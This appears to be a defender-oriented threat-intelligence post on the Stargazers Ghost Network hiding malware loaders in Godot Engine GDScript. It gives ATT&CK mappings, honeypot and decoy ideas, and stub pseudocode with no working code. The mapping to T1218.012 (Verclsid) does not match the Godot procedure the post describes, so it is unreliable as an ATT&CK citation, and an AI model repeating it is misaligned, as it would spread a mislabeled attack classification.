Undetected Playground for Malware

Subject: Undetected Playground for Malware

Tactics: TA0005 Defense Evasion, TA0001 Initial Access

Technique: T1218.012 System Binary Proxy Execution: Verclsid

Procedure:

Threat actors embedded malicious GDScript code within the Godot Engine, a legitimate software.
Upon execution of the Godot Engine, the GDScript is loaded, which then downloads and executes a malicious payload.
This technique has been successful in remaining undetected by most antivirus tools.

Vulnerability: EAV0001 When adversaries interact with the environment or personas, they are vulnerable when they collect, observe, or manipulate system artifacts or information. Manipulated data may cause them to reveal behaviors, use additional or more advanced capabilities against the target, and/or impact their dwell time., EAV0013 When adversaries rely on specific resources to be enabled, accessible, and/or vulnerable, they are vulnerable to their operations being disrupted if the resources are disabled, removed, or otherwise made invulnerable.

Engagement Opportunity:

Honeypot: Create a decoy environment using the Godot Engine. Instrument components within this environment to capture attacker actions, analyze their TTPs, and gather intelligence on their tools and techniques.
Misinformation: Within the Godot Engine environment, introduce subtle alterations or plant misleading information. This could disrupt attacker operations, misdirect their efforts, or potentially gather intelligence on their objectives and motives.

Threat Actor: Stargazers Ghost Network

Threat Objective:

Deliver and execute malware
Potential objectives include credential theft, ransomware encryption, or other malicious activities.

Deception Opportunity:

Decoy Files: Plant decoy files within the Godot Engine environment that mimic sensitive data or valuable assets to lure attackers, misdirect their attention, and potentially expose their tools and techniques.
False Environment: Create a false, instrumented environment within the Godot Engine that appears to be a legitimate target. Isolate and monitor this environment to deceive attackers, study their behaviors, and gather threat intelligence.

Sensor Data Placement: Application

Observable Level: Core to Adversary-Brought Tool

Scoring Rationale:

The use of the Godot Engine as an attack vector is specific to the adversary’s toolset, making it detectable if the tool is known.
The presence of malicious GDScript is also tied to the adversary’s tool and can be detected through code analysis.
Network connections to attacker infrastructure are observable at the User-Mode level and can be detected through network monitoring.

Observable Level:

Godot Engine as an attack vector: Core to Adversary-Brought Tool
Presence of malicious GDScript: Core to Adversary-Brought Tool
Network connections to attacker C2 infrastructure: Core to Adversary-Brought Tool

Link to Report: https://www.google.com/url?sa=E&source=gmail&q=https://www.google.com/url?sa=E%26source=gmail%26q=https://research.checkpoint.com/2024/gaming-engines-an-undetected-playground-for-malware-loaders/

Link to Report II.:

Additional Comments:

The threat actor demonstrated continuous evolution of their TTPs, including evasion techniques and encryption methods.
The use of legitimate platforms like Bitbucket for hosting payloads highlights the increasing sophistication of attackers.

Possible elements:

MSG (Pseudocode):

# Malicious Sub-Graph Standard

# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])

# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])

# Stargazers Ghost Network Attack Graph

[1]: Initial Access - System Binary Proxy Execution - Execute malicious GDScript within Godot Engine (Core to Adversary-Brought Tool)
[2]: Execution - User Execution - User downloads and executes malicious Godot game or legitimate game with modified .pck file (Lack of User Awareness)
[3]: Defense Evasion - Obfuscated Files or Information - GDScript employs anti-sandbox and anti-VM techniques (Core to Adversary-Brought Tool)
[4]: Command and Control - Application Layer Protocol - Communicate with C2 server to download additional payloads (Core to Adversary-Brought Tool)
[5]: Impact - Data Encrypted for Impact - Deploy ransomware or other malware for malicious activities (Core to Adversary-Brought Tool)

1 --> 2 (Lack of User Awareness)
2 --> 3 (Lack of User Awareness)
3 --> 4 (Unfamiliarity with Godot Engine as an attack vector)
4 --> 5 (Unfamiliarity with Godot Engine as an attack vector)

# Pseudocode Standard

# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]

# Stargazers Ghost Network Pseudocode

function Initial_Access_System_Binary_Proxy_Execution():
# Embed malicious GDScript within Godot Engine
return malicious_Godot_game

function Execution_User_Execution(malicious_Godot_game):
# User downloads and executes malicious_Godot_game
return execution_of_GDScript

function Defense_Evasion_Obfuscated_Files_or_Information(execution_of_GDScript):
# Employ anti-sandbox and anti-VM techniques within GDScript
return C2_communication

function Command_and_Control_Application_Layer_Protocol(C2_communication):
# Establish connection with C2 server to download additional payloads
return malicious_payload

function Impact_Data_Encrypted_for_Impact(malicious_payload):
# Execute malicious_payload (e.g., ransomware)
return impact_achieved

Leave a Reply Cancel reply

ORION Detlab: Forging Resilient Detections in the HEFAISTOS Ecosystem

The Maieutic Engine: Birth of a New Detection Engineering Paradigm

The Forge, The Guide, and The Hunter: Unifying Detection Engineering with the Mythological Triad of HEFAISTOS, KEDALION, and ORION

Dendrite: Bridging the Synaptic Gap Between External Intelligence and Internal Defense